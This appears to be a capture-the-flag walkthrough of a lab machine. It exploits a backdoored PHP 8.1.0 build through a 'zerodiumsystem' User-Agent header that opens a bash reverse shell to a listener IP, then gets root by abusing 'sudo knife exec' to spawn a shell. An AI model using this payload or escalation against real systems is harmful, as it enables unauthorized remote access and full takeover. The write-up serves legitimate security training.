So let’s go-to browser and see what web server is running on port 80
I tried to enumerate HTTP web server first by
- taking a look at source code for comments and anything interesting
- directory brute-forcing
- trying to find version exploits for services
But, no luck with all of them then I saw wappalyzer showed PHP running
PHP 8.1.0 so I went to google and search for an exploit.
So I found there are 2 ways to get the user shell…
here you’ll find a python script to get a user shell simply by running the script and giving it a URL.
Or we can see the HTTP req… By our fav buddy BURP
Send it to Repeater we are going to get a reverse shell by forwarding the request with a new user- agent and listening on a port via netcat
User-Agent: zerodiumsystem(“ /bin/bash -c ‘bash -i >&/dev/tcp/10.10.14.162/1234 0>&1 ‘“);
and open a listner on another tab…
nc -nvlp 1234
now You can easily find the user flag I suppose…
Let’s move to Priv esc
On sudo -l we saw we can cat /usr/bin/knife without a password
After a little enumeration, You’ll find how easy it is to get a root shell
so further enum I found out a knife instance is running
google knife exploit and read the docs…
Now read through the documentation and you'll see we can run ruby scripts or ruby code as stated below:-
run the following command
sudo knife exec — exec “exec ‘/bin/sh -i’ ”
And there we go we have successfully rooted the box..
Thanks for the read Please do share and follow me.